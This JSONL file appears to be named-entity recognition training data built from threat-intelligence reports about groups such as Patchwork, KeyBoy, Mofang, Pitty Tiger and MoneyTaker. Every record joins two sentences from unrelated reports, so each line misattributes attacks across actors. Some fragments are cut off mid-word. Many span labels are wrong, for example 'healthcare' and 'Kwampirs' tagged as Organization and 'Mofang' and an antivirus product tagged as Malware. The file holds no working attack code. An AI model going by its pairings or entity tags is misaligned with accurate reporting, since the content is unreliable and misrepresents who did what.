{"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 62, "end": 75, "label": "Organization"}, {"start": 142, "end": 155, "label": "Vulnerability"}, {"start": 267, "end": 293, "label": "Malware"}, {"start": 424, "end": 443, "label": "Organization"}]}
{"text": "While investigating a 2016 intrusion , Secureworks incident responders identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . By relying on a native PDF command to navigate to a new URL , Zirconium successfully circumvented Chrome 's anti-redirect protection .", "spans": [{"start": 39, "end": 50, "label": "Organization"}, {"start": 82, "end": 95, "label": "Organization"}, {"start": 162, "end": 175, "label": "Vulnerability"}]}
{"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when the group compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . In the context of the Ismdoor RAT , the DNS attack technique is used primarily by Greenbug for stealing credentials .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 81, "end": 86, "label": "Organization"}, {"start": 218, "end": 229, "label": "Malware"}]}
{"text": "Symantec discovered the most recent wave of Tick attacks in July 2015 , when BRONZE BUTLER compromised three different Japanese websites with a Flash ( .swf ) exploit to mount watering hole attacks . To do this , it employs a number of specific commands via DNSMessenger .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 77, "end": 90, "label": "Organization"}, {"start": 258, "end": 270, "label": "Malware"}]}
{"text": "However , even though the TTPs of the Cleaver team have some overlap to techniques used by Iranian Cyber Army ( botnets ) , Ashiyane ( SQL injection ) and Syrian Electronic Army ( phishing ) , we believe this is largely the work of a new team . Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies .", "spans": [{"start": 38, "end": 45, "label": "Organization"}, {"start": 99, "end": 109, "label": "Organization"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 155, "end": 177, "label": "Organization"}, {"start": 332, "end": 341, "label": "Organization"}, {"start": 346, "end": 370, "label": "Organization"}]}
{"text": "In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent .", "spans": [{"start": 23, "end": 29, "label": "Organization"}]}
{"text": "To ensure remote access to the workstation of an employee at a target organization , the Cobalt group ( as in previous years ) uses Beacon , a Trojan available as part of commercial penetration testing software . Named Trochilus , this new RAT was part of Group 27 's malware portfolio that included six other malware strains , all served together or in different combinations , based on the data that needed to be stolen from each victim .", "spans": [{"start": 89, "end": 101, "label": "Organization"}, {"start": 132, "end": 138, "label": "System"}, {"start": 219, "end": 228, "label": "Malware"}, {"start": 240, "end": 243, "label": "Malware"}]}
{"text": "In a recent spear-phishing campaign , the Cobalt Hacking Group used a remote code execution vulnerability in Microsoft Office software to connect to its command and control server via Cobalt Strike . According to the security experts , this collection of malware was discovered after their first initial report was published , meaning that Group 27 ignored the fact they were unmasked and continued to infect their targets regardless , through the same entry point , the Myanmar Union Election Commission ( UEC ) website .", "spans": [{"start": 42, "end": 62, "label": "Organization"}, {"start": 184, "end": 197, "label": "System"}, {"start": 471, "end": 504, "label": "Organization"}, {"start": 507, "end": 510, "label": "Organization"}]}
{"text": "Gallmaker used lure documents attempt to exploit the Microsoft Office Dynamic Data Exchange ( DDE ) protocol in order to gain access to victim machines . Trochilus RAT activity was discovered during both months of October and November 2015 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}]}
{"text": "We believe that these industries have also been targeted as part of a larger supply-chain attack in order for Orangeworm to get access to their intended victims related to healthcare . From September 2016 through late November 2016 , a threat actor group used both the Trochilus RAT and a newly idenfied RAT we've named MoonWind to target organizations in Thailand , including a utility organization .", "spans": [{"start": 172, "end": 182, "label": "Organization"}, {"start": 269, "end": 282, "label": "Malware"}, {"start": 304, "end": 307, "label": "Malware"}, {"start": 320, "end": 328, "label": "Malware"}, {"start": 379, "end": 399, "label": "Organization"}]}
{"text": "Orangeworm 's secondary targets include Manufacturing , Information Technology , Agriculture , and Logistics . We chose the name ' MoonWind ' based on debugging strings we saw within the samples , as well as the compiler used to generate the samples .", "spans": [{"start": 40, "end": 53, "label": "Organization"}, {"start": 56, "end": 78, "label": "Organization"}, {"start": 81, "end": 92, "label": "Organization"}, {"start": 99, "end": 108, "label": "Organization"}, {"start": 131, "end": 139, "label": "Malware"}]}
{"text": "While these industries may appear to be unrelated , we found them to have multiple links to healthcare , such as large manufacturers that produce medical imaging devices sold directly into healthcare firms , IT organizations that provide support services to medical clinics , and logistical organizations that deliver healthcare products . The attackers compromised two legitimate Thai websites to host the malware , which is a tactic this group has used in the past .", "spans": [{"start": 92, "end": 102, "label": "Organization"}, {"start": 189, "end": 205, "label": "Organization"}, {"start": 208, "end": 224, "label": "Organization"}, {"start": 258, "end": 273, "label": "Organization"}, {"start": 280, "end": 304, "label": "Organization"}, {"start": 318, "end": 328, "label": "Organization"}, {"start": 370, "end": 394, "label": "Malware"}]}
{"text": "Once Orangeworm has infiltrated a victim 's network , they deploy Trojan.Kwampirs , a backdoor Trojan that provides the attackers with remote access to the compromised computer . Both the Trochilus and MoonWind RATs were hosted on the same compromised sites and used to target the same organization at the same time .", "spans": [{"start": 86, "end": 101, "label": "System"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 188, "end": 197, "label": "Malware"}, {"start": 202, "end": 215, "label": "Malware"}]}
{"text": "Patchwork targets were chosen worldwide with a focus on personnel working on military and political assignments , and specifically those working on issues relating to Southeast Asia and the South China Sea . The attackers used different command and control servers ( C2s ) for each malware family , a tactic we believe was meant to thwart attempts to tie the attacks together using infrastructure alone .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 77, "end": 111, "label": "Organization"}, {"start": 237, "end": 264, "label": "Malware"}]}
{"text": "Kwampirs uses a fairly aggressive means to propagate itself once inside a victim 's network by copying itself over network shares . Further research led us to additional MoonWind samples using the same C2 ( dns.webswindows.com ) but hosted on a different compromised but legitimate website .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 170, "end": 186, "label": "Malware"}, {"start": 202, "end": 204, "label": "System"}, {"start": 271, "end": 289, "label": "Malware"}]}
{"text": "In mid-August , the OilRig threat group sent what appeared to be a highly targeted phishing email to a high-ranking office in a Middle Eastern nation . The attacks in that case took place in late September to early October 2016 and the attackers stored the MoonWind samples as RAR files , while in the November attacks the RATs were stored as executables .", "spans": [{"start": 20, "end": 26, "label": "Organization"}, {"start": 27, "end": 39, "label": "Organization"}, {"start": 257, "end": 273, "label": "Malware"}, {"start": 277, "end": 286, "label": "Malware"}, {"start": 323, "end": 327, "label": "Malware"}]}
{"text": "Patchwork 's attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 . We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 71, "end": 94, "label": "Organization"}]}
{"text": "The attack was detected as part of a spear phishing against a government organization in Europe in late May 2016 . Trochilus was first reported by Arbor Networks in their Seven Pointed Dagger report tying its use to other targeted Southeast Asia activity .", "spans": [{"start": 62, "end": 85, "label": "Organization"}, {"start": 115, "end": 124, "label": "Malware"}, {"start": 147, "end": 161, "label": "Organization"}]}
{"text": "The Patchwork attack group has been targeting more than just government-associated organizations . The activity dates to at least 2013 and has ties to multiple reports by other researchers .", "spans": [{"start": 4, "end": 13, "label": "Organization"}, {"start": 14, "end": 26, "label": "Organization"}, {"start": 61, "end": 96, "label": "Organization"}]}
{"text": "Symantec has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . It is highly likely MoonWind is yet another new tool being used by the group or groups responsible for that activity , indicating they are not only still active but continuing to evolve their playbook .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 38, "end": 47, "label": "Organization"}, {"start": 64, "end": 81, "label": "Organization"}, {"start": 185, "end": 193, "label": "Malware"}]}
{"text": "Two security companies , Cymmetria and Kaspersky , each recently released reports on the campaign , most of which are in line with our observations . The samples provided were alleged to be targeting Tibetan and Chinese Pro-Democracy Activists .", "spans": [{"start": 39, "end": 48, "label": "Organization"}]}
{"text": "Symantec Security Response has been actively monitoring Patchwork , also known as Dropping Elephant , which uses Chinese-themed content as bait to compromise its targets ' networks . On June 7 , 2013 , Rapid7 released an analysis of malware dubbed ' KeyBoy ' , also exploiting unknown vulnerabilities in Microsoft Office , similarly patched by MS12-060 , but allegedly targeting interests in Vietnam and India .", "spans": [{"start": 0, "end": 26, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 82, "end": 99, "label": "Organization"}, {"start": 202, "end": 208, "label": "Organization"}, {"start": 250, "end": 256, "label": "Malware"}, {"start": 304, "end": 313, "label": "Organization"}, {"start": 344, "end": 352, "label": "Malware"}]}
{"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . As we have seen in some previous targeted malware attacks , the attackers in this incident are taking advantage of services like .", "spans": [{"start": 88, "end": 96, "label": "Organization"}]}
{"text": "Although approximately half of the attacks focus on the US , other targeted regions include China , Japan , Southeast Asia , and the United Kingdom . com to establish free subdomains in their infrastructure .", "spans": []}
{"text": "While Orangeworm has impacted only a small set of victims in 2016 and 2017 according to Symantec telemetry , we have seen infections in multiple countries due to the nature of the victims operating large international corporations . Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar .", "spans": [{"start": 88, "end": 96, "label": "Organization"}, {"start": 250, "end": 268, "label": "Malware"}]}
{"text": "Our first observation of an attempted attack related to this campaign dates back to November 2015 , although Symantec telemetry data indicates that the campaign may have already existed in early 2015 or perhaps even earlier . Subdomains at phmail.us have been linked to malicious activity dating back as far as December 2011 .", "spans": [{"start": 109, "end": 117, "label": "Organization"}]}
{"text": "Should a user enable this content , Gallmaker is then able to use the DDE protocol to remotely execute commands in memory on the victima 's system . Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain .", "spans": [{"start": 36, "end": 45, "label": "Organization"}, {"start": 70, "end": 82, "label": "System"}, {"start": 210, "end": 213, "label": "Indicator"}, {"start": 216, "end": 220, "label": "Organization"}]}
{"text": "While both back door Trojans wait for commands from the threat actor , they can search for files and upload them to the specified server once activated . In this blog post we'll analyze two specific incidents apparently targeting victims in Vietnam and in India and we'll describe the capabilities of the custom backdoor being used that for convenience ( and to our knowledge , for a lack of an existing name ) we call KeyBoy , due to a string present in one of the samples .", "spans": [{"start": 56, "end": 68, "label": "Organization"}, {"start": 312, "end": 320, "label": "Malware"}, {"start": 419, "end": 425, "label": "Malware"}]}
{"text": "Patchwork ( also known as Dropping Elephant ) is a cyberespionage group whose targets included diplomatic and government agencies as well as businesses . We encountered the first document exploit called \" THAM luan - GD - NCKH2.doc \" a few days ago , which appears to be leveraging some vulnerabilities patched with MS12-060 .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 26, "end": 43, "label": "Organization"}, {"start": 51, "end": 71, "label": "Organization"}, {"start": 95, "end": 105, "label": "Organization"}, {"start": 110, "end": 129, "label": "Organization"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 188, "end": 195, "label": "Vulnerability"}, {"start": 205, "end": 221, "label": "Indicator"}, {"start": 222, "end": 231, "label": "Indicator"}, {"start": 316, "end": 324, "label": "Malware"}]}
{"text": "Patchwork is known for rehashing off-therack tools and malware for its own campaigns . This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 23, "end": 50, "label": "System"}, {"start": 55, "end": 62, "label": "System"}]}
{"text": "They also included Dynamic Data Exchange ( DDE ) and Windows Script Component ( SCT ) abuse to their tactics , as well as started exploiting recently reported vulnerabilities . For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same ACT .", "spans": [{"start": 222, "end": 241, "label": "Malware"}]}
{"text": "These socially engineered emails contain web links of weaponized documents containing exploits or macros . In the second set they are making use of a dynamic DNS service by .", "spans": [{"start": 150, "end": 169, "label": "Malware"}]}
{"text": "It contains an additional meta tag at the end of the web page source code , \" refreshing \" ( redirecting ) the site visitor to the weaponized document . com .", "spans": []}
{"text": "It 's probable that Patchwork uses this package to facilitate server installation when using a Windows environment . The Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 121, "end": 138, "label": "Organization"}, {"start": 208, "end": 215, "label": "Malware"}]}
{"text": "In March and April 2018 , Volexity identified multiple spear phishing campaigns attributed to Patchwork , an Indian APT group also known as Dropping Elephant . he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information .", "spans": [{"start": 26, "end": 34, "label": "Organization"}, {"start": 94, "end": 103, "label": "Organization"}, {"start": 116, "end": 125, "label": "Organization"}, {"start": 140, "end": 157, "label": "Organization"}, {"start": 163, "end": 180, "label": "Organization"}, {"start": 250, "end": 257, "label": "Malware"}]}
{"text": "This increase in threat activity was consistent with other observations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on Chinese organizations and Trend Micro noting targets in South Asia . They are often targeted simultaneously with other ethnic minorities and religious groups in China .", "spans": [{"start": 120, "end": 150, "label": "Organization"}, {"start": 198, "end": 209, "label": "Organization"}, {"start": 291, "end": 308, "label": "Organization"}, {"start": 313, "end": 329, "label": "Organization"}]}
{"text": "Volexity has also found that , in addition to sending malware lures , the Patchwork threat actors are leveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 74, "end": 97, "label": "Organization"}, {"start": 257, "end": 273, "label": "Indicator"}, {"start": 293, "end": 331, "label": "Organization"}, {"start": 334, "end": 338, "label": "Organization"}, {"start": 360, "end": 370, "label": "Organization"}, {"start": 375, "end": 388, "label": "Organization"}]}
{"text": "The newsletter includes a link to the attacker 's website , which has content focusing on topics related to China to draw the target 's interest . More recently in 2016 , Arbor Networks reported on connected malware operations continuing to target these same groups , which the Communist Party of China perceives as a threat to its power .", "spans": [{"start": 38, "end": 46, "label": "Organization"}, {"start": 171, "end": 185, "label": "Organization"}]}
{"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 174, "end": 186, "label": "Indicator"}]}
{"text": "The threat actors appear to have leveraged publicly available exploit code that can be found on Github at the URL : https://github.com/rxwx/CVE-2017-8570 . For example , we have observed frequent reuse of older ( patched ) exploits in malware operations against the Tibetan community .", "spans": [{"start": 4, "end": 17, "label": "Organization"}, {"start": 266, "end": 283, "label": "Organization"}]}
{"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . These operations involved highly targeted email lures with repurposed content and attachments that contained an updated version of KeyBoy .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 56, "end": 65, "label": "Organization"}, {"start": 90, "end": 102, "label": "Organization"}, {"start": 147, "end": 157, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 258, "end": 269, "label": "Malware"}, {"start": 347, "end": 353, "label": "Malware"}]}
{"text": "At this point , the attackers know the user has opened the document and send another spear-phishing email , this time containing an MS Word document with an embedded executable . In August and October 2016 we observed a malware operation targeting members of the Tibetan Parliament ( the highest legislative organ of the Tibetan government in exile , formally known as Central Tibetan Administration ) .", "spans": [{"start": 20, "end": 29, "label": "Organization"}, {"start": 132, "end": 148, "label": "Malware"}, {"start": 263, "end": 281, "label": "Organization"}, {"start": 321, "end": 339, "label": "Organization"}, {"start": 369, "end": 399, "label": "Organization"}]}
{"text": "The Word document usually exploits CVE-2012-0158 . The Arbor report describes the ongoing use of these four vulnerabilities in a series of espionage campaigns against not only Tibetan groups , but also others related to Hong Kong , Taiwan , and Uyghur interests .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 55, "end": 60, "label": "Organization"}, {"start": 176, "end": 190, "label": "Organization"}]}
{"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . The malware samples deployed in both of these operations are updated versions of the KeyBoy backdoor first discussed in 2013 by Rapid7 .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 181, "end": 196, "label": "Malware"}, {"start": 224, "end": 230, "label": "Organization"}]}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . This behavioural tactic was previously mentioned in relation to KeyBoy in a 2013 blog post by Cisco .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 156, "end": 162, "label": "Malware"}, {"start": 186, "end": 191, "label": "Organization"}]}
{"text": "From the attacks observed by Volexity , what is most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based think tanks . These versions of KeyBoy differed from the one first described by Rapid7 in several ACTs , many of which will be described in the sections to follow .", "spans": [{"start": 29, "end": 37, "label": "Organization"}, {"start": 69, "end": 78, "label": "Organization"}, {"start": 188, "end": 194, "label": "Malware"}, {"start": 236, "end": 242, "label": "Organization"}]}
{"text": "Once started , it downloads additional malware from the C2 and also uploads some basic system information , stealing , among other things , the user 's Google Chrome credentials . These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus .", "spans": [{"start": 212, "end": 219, "label": "Vulnerability"}]}
{"text": "It repeatedly attempts to iterate through directories and to collect files with the following extensions : doc , docx , ppt , pptx , pps , ppsx , xls , xlsx , and pdf . We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures .", "spans": [{"start": 107, "end": 110, "label": "System"}, {"start": 113, "end": 117, "label": "System"}, {"start": 120, "end": 123, "label": "System"}, {"start": 126, "end": 130, "label": "System"}, {"start": 133, "end": 136, "label": "System"}, {"start": 139, "end": 143, "label": "System"}, {"start": 146, "end": 149, "label": "System"}, {"start": 152, "end": 156, "label": "System"}, {"start": 163, "end": 166, "label": "System"}, {"start": 207, "end": 221, "label": "Malware"}]}
{"text": "In this case , a small group reusing exploit code , some powershell-based malware and mostly social engineering has been able to steal sensitive documents and data from victims since at least November 2015 . In another modification , first observed in the most recent October 11 Parliamentarian operation ( version agewkassif ) , the developer (s ) of KeyBoy began using a string obfuscation routine in order to hide many of the critical values referenced within the malware .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 57, "end": 81, "label": "System"}, {"start": 93, "end": 111, "label": "Organization"}, {"start": 352, "end": 358, "label": "Malware"}, {"start": 373, "end": 399, "label": "Malware"}]}
{"text": "In the past few months , Unit 42 has observed the Patchwork group , alternatively known as Dropping Elephant and Monsoon , conducting campaigns against targets located in the Indian subcontinent . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware .", "spans": [{"start": 25, "end": 32, "label": "Organization"}, {"start": 50, "end": 65, "label": "Organization"}, {"start": 91, "end": 108, "label": "Organization"}, {"start": 113, "end": 120, "label": "Organization"}, {"start": 197, "end": 208, "label": "Organization"}, {"start": 254, "end": 260, "label": "Malware"}]}
{"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": [{"start": 4, "end": 23, "label": "Malware"}, {"start": 126, "end": 139, "label": "Organization"}, {"start": 307, "end": 320, "label": "Vulnerability"}]}
{"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 209, "end": 233, "label": "Organization"}, {"start": 267, "end": 288, "label": "Indicator"}, {"start": 304, "end": 330, "label": "Malware"}]}
{"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . Chances are about even , though , that Mofang is a relevant threat actor to any organization that invests in Myanmar or is otherwise politically involved .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 359, "end": 370, "label": "Organization"}]}
{"text": "The Patchwork group continues to plague victims located within the Indian subcontinent . In addition to the campaign in Myanmar , Mofang has been observed to attack targets across multiple sectors ( government , military , critical infrastructure and the automotive and weapon industries ) in multiple countries .", "spans": [{"start": 4, "end": 19, "label": "Organization"}, {"start": 130, "end": 136, "label": "Organization"}, {"start": 199, "end": 209, "label": "Organization"}, {"start": 212, "end": 220, "label": "Organization"}, {"start": 223, "end": 246, "label": "Organization"}, {"start": 255, "end": 265, "label": "Organization"}, {"start": 270, "end": 287, "label": "Organization"}]}
{"text": "The overarching campaign appears to target both Chinese nationals within different industries and government agencies in Southern Asia . This threat report gives insight into some of the information that Fox-IT has about a threat actor that it follows , called Mofang .", "spans": [{"start": 98, "end": 117, "label": "Organization"}, {"start": 204, "end": 210, "label": "Organization"}, {"start": 261, "end": 267, "label": "Organization"}]}
{"text": "It appears to have started in December 2015 and is still ongoing as of July 2016 . The name Mofang is based on the Mandarin verb , which means to imitate .", "spans": [{"start": 92, "end": 98, "label": "Organization"}]}
{"text": "The use of weaponized legitimate documents is a longstanding operational standard of Patchwork . It is highly likely that the Mofang group is a group that operates out of China and is probably government-affiliated .", "spans": [{"start": 11, "end": 42, "label": "System"}, {"start": 85, "end": 94, "label": "Organization"}, {"start": 126, "end": 138, "label": "Organization"}]}
{"text": "It is dropped by at least one of the weaponised documents17 used in the MONSOON campaign where it is embedded inside another executable . Chapter 7 explains the working of Mofang 's preferred tools : ShimRat and SimRatReporter .", "spans": [{"start": 48, "end": 59, "label": "System"}, {"start": 200, "end": 207, "label": "Malware"}, {"start": 212, "end": 226, "label": "Malware"}]}
{"text": "The majority of the code for TINYTYPHON is taken from the MyDoom worm and has been repurposed to find and exfiltrate documents . The Mofang group has been active in relation to the Kyaukphyu sez .", "spans": [{"start": 58, "end": 69, "label": "System"}, {"start": 133, "end": 145, "label": "Organization"}]}
{"text": "The targeting of Chinese nationals may also be related to this campaign , but equally may be part of a separate campaign by the adversary or even as part of them selling Surveillance-As-A-Service in a similar manner previously seen with the HANGOVER group . KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine .", "spans": [{"start": 170, "end": 195, "label": "System"}, {"start": 241, "end": 255, "label": "Organization"}, {"start": 258, "end": 264, "label": "Malware"}]}
{"text": "The use of weaponized legitimate documents is a longstanding operational standard of this group . The first attack started in early July with a ShimRatReporter payload .", "spans": [{"start": 11, "end": 42, "label": "System"}, {"start": 90, "end": 95, "label": "Organization"}, {"start": 144, "end": 159, "label": "Indicator"}]}
{"text": "We decided to spend some time to investigate around this malware and found out that it was used exclusively by a single group of attackers . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez .", "spans": [{"start": 120, "end": 125, "label": "Organization"}, {"start": 129, "end": 138, "label": "Organization"}, {"start": 172, "end": 178, "label": "Organization"}]}
{"text": "The newsnstat.com domain was used earlier in 2015 for previous HANGOVER campaigns , and was then repurposed in December 2015 for the MONSOON campaign . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": [{"start": 175, "end": 181, "label": "Organization"}]}
{"text": "Our researches around the malware family revealed the \" Pitty Tiger \" group has been active since 2011 , yet we found traces which makes us believe the group is active since 2010 . In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report .", "spans": [{"start": 56, "end": 67, "label": "Organization"}, {"start": 70, "end": 75, "label": "Organization"}, {"start": 152, "end": 157, "label": "Organization"}]}
{"text": "The group exploits known vulnerabilities in Microsoft Office products to infect their targets with malware . From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 44, "end": 69, "label": "System"}, {"start": 182, "end": 200, "label": "Malware"}, {"start": 205, "end": 211, "label": "Malware"}]}
{"text": "Pitty Tiger group is sometimes using stolen material as spear phishing content to target other persons . In September 2015 Mofang launched another attack .", "spans": [{"start": 0, "end": 17, "label": "Organization"}, {"start": 123, "end": 129, "label": "Organization"}]}
{"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 60, "label": "Vulnerability"}, {"start": 123, "end": 130, "label": "Malware"}]}
{"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) .", "spans": [{"start": 31, "end": 55, "label": "Vulnerability"}]}
{"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 217, "end": 239, "label": "Organization"}, {"start": 313, "end": 329, "label": "Organization"}]}
{"text": "PittyTiger could also use CVE-2014-1761 , which is more recent . In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 26, "end": 39, "label": "Vulnerability"}, {"start": 80, "end": 85, "label": "Organization"}, {"start": 92, "end": 108, "label": "Organization"}, {"start": 122, "end": 131, "label": "Organization"}]}
{"text": "\" PittyTiger \" is a mutex used by the malware . Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": [{"start": 2, "end": 12, "label": "Organization"}, {"start": 20, "end": 25, "label": "System"}]}
{"text": "This RAT is the origin of the attackers ' group name . The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": [{"start": 5, "end": 8, "label": "System"}, {"start": 30, "end": 39, "label": "Organization"}, {"start": 42, "end": 47, "label": "Organization"}, {"start": 87, "end": 95, "label": "Organization"}, {"start": 185, "end": 189, "label": "Organization"}]}
{"text": "Paladin RAT is another remote administration tool used by the Pitty Tiger group . The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": [{"start": 0, "end": 11, "label": "System"}, {"start": 62, "end": 79, "label": "Organization"}, {"start": 114, "end": 122, "label": "Organization"}, {"start": 212, "end": 216, "label": "Organization"}]}
{"text": "Pitty Tiger , like other APT attackers , often use anti-virus \" familiar names \" when registering domains or creating subdomains . In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": [{"start": 0, "end": 11, "label": "Organization"}, {"start": 25, "end": 28, "label": "Organization"}, {"start": 29, "end": 38, "label": "Organization"}, {"start": 155, "end": 165, "label": "Organization"}, {"start": 209, "end": 214, "label": "Organization"}, {"start": 219, "end": 227, "label": "Organization"}, {"start": 234, "end": 238, "label": "Organization"}]}
{"text": "\" Pitty Tiger \" is also a string transmitted in the network communications of the RAT . In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": [{"start": 2, "end": 13, "label": "Organization"}, {"start": 26, "end": 32, "label": "System"}, {"start": 82, "end": 85, "label": "System"}, {"start": 152, "end": 157, "label": "Organization"}, {"start": 162, "end": 170, "label": "Organization"}, {"start": 177, "end": 181, "label": "Organization"}]}
